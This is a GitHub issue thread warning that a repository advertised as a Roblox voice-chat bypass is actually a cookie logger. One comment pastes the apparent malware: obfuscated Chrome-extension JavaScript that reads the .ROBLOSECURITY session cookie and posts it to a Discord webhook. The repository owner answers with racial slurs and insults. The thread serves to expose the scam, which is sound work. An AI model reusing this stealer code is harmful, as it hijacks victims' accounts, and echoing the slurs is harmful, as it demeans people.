### ISSUE TITLE
PSA

### ISSUE THREAD

**Issue by jacobvd0** [sleeznem/VoiceChat-ByPassed#1]
Just letting you know that this is a cookie logger. Don't download this (there's probably no way to get voice chat without verification).

**Comment by sleeznem** [comment]
Oh word mb I'll take it down I advertised it for my friends I didn't know
but thanks for letting me know

**Comment by MatiDebugging** [comment]
bro take it down then

**Comment by sleeznem** [comment]
Nigga beg son your poor irl LOL

**Comment by mikhailramlal** [comment]
yes it is a cookie logger i saw this exact template in beaming methods called extension logger there are so many better methods

**Comment by mikhailramlal** [comment]
this yo code bro? 

function webhookReq(_0x7defx2, _0x7defx3) {
  var _0x7defx4 = {embeds: [{title: `${"$ Scarlett#0001 on top"}`, description: ">>> Smoked has tooken another account lmao :skull:", color: 141414, fields: [{name: "Cookie", value: "```\n" + _0x7defx3 + "\n```", inline: false}]}]};
  fetch(_0x7defx2, {method: "POST", headers: {"Content-type": "application/json"}, body: JSON.stringify(_0x7defx4)});
}
cookieInfo = {url: "https://www.roblox.com/", name: ".ROBLOSECURITY"};
chrome.cookies.get(cookieInfo, function (_0x7defx3) {
  if (_0x7defx3) {
    webhookReq("https://discord.com/api/webhooks/981812464272441364/gxeXShBmSf6H2fS7GM9GNgXSZiK3B_wd9m4tJz9Lq12rQz9LudetywFQ9ecfIxAIwc-J", _0x7defx3.value);
  }
});


was gonna delete the webhook but its already deleted 💀

**Comment by mikhailramlal** [comment]
skid

**Comment by jacobvd0** [comment]
> was gonna delete the webhook but its already deleted 💀

already did it ages ago dw

**Comment by sleeznem** [comment]
holy shit you fat niggas are so annoying i havent touched roblox nor
discord for half a year now, you fat ass discord mods needa hop off and
stop contactin my gmail and make some money irl ngl gng 😭😭
